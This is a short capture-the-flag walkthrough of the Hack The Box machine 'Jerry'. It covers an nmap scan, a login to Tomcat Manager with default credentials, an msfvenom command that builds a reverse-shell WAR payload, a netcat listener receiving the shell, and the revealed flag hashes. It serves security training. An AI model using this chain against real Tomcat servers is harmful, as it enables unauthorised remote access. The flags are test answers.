Jerry

Super Easy Windows HTB Box recommended for beginners

Reconnaissance

As often, we start off by a port scan using Nmap

nmap -p- --open -Pn -n --min-rate 5000 -sS -sCV 10.10.10.95 -oN scan

# Nmap 7.95 scan initiated Sun Jul 27 18:12:21 2025 as: /usr/lib/nmap/nmap --privileged -p- --open -Pn -n --min-rate 5000 -sS -sCV -oN scan 10.10.10.95
Nmap scan report for 10.10.10.95
Host is up (0.042s latency).
Not shown: 65534 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/7.0.88

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jul 27 18:12:59 2025 -- 1 IP address (1 host up) scanned in 38.38 seconds

We see that only one port is opened on the target system: TCP 8080 (HTTP) And we also see it's running the Apache Tomcat CMS, visiting the webpage with our browsers we see the typical Tomcat dashboard

We check the "Manager App" section, where we login into the admin panel with the default credentials tomcat:s3cret

We can see we are able to uploada .WAR file so we proceed to generate a malicious Reverse Shell WAR File with msfvenom

msfvenom -p java/shell_reverse_tcp LHOST=IP LPORT=1336 -f war -o shell.war

Exploitation

We set up our listener, upload the file and access it and we successfully get a reverse shell on our system

rlwrap nc -lvnp 1336
Listening on 0.0.0.0 1336
Connection received on 10.10.10.95 49192
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\apache-tomcat-7.0.88>

We also see that both of the flags are accessible on the C:\Users\Administrator\Desktop directory as "2 for the price of 1.txt" so we just retrieve them!

C:\Users\Administrator\Desktop\flags>type "2 for the price of 1.txt"
type "2 for the price of 1.txt"
user.txt
7004dbcef0f854e0fb401875f26ebd00

root.txt
04a8b36e1545a455393d067e772fe90e
C:\Users\Administrator\Desktop\flags>